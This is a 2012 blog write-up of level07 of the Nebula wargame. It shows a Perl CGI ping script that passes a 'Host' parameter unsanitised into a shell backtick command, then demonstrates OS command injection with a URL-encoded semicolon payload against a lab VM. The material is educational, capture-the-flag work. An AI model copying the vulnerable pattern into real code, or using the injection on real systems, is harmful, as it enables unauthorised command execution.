Tuesday, October 30, 2012

exploit-exercises Nebula: level07


In level07 of Nebula wargame, we are faced with a vulnerable Perl CGI script, hosted with thttpd web server.
level07@nebula:/home/flag07$ ls -l
total 8
-rwxr-xr-x 1 root root  368 2011-11-20 21:22 index.cgi
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf
level07@nebula:/home/flag07$ cat index.cgi 
#!/usr/bin/perl
use CGI qw{param};
print "Content-type: text/html\n\n";
sub ping {
    $host = $_[0];
    print("<html><head><title>Ping results</title></head><body><pre>");
    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }
    print("</pre></body></html>");
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
The interesting parts are in red. The script takes the value of "Host" HTTP parameter, and provide it as an argument to ping utility. The vulnerability lies in how the value of the parameter is passed, without any verification, resulting in a OS command injection vulnerability. Our attack vector will be the Host HTTP parameter:
http://192.168.56.101:7007/index.cgi?Host=something_malicious
Just one detail we have to pay attention to, url encoding. As characters such as "/", "?" etc,. have a special meaning in HTTP, we need a way to represent them as data. In our case, we will need the ";" character (whose URL encoding is "%3B").
Navigating to the URL: http://192.168.56.2:7007/index.cgi?Host=%3bgetflag will return "You have successfully executed getflag on a target account."

No comments:

Post a Comment